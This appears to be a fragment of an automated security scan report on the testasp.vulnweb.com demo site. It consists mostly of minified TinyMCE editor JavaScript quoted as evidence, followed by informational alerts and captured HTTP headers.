sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| Instances | 2 |
| Solution |
Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.
|
| Reference | |
| Tags |
OWASP_2021_A01
OWASP_2017_A03 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10027 |
|
Informational |
Modern Web Application |
|---|---|
| Description |
The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
|
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <a>(.*?)</a> |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
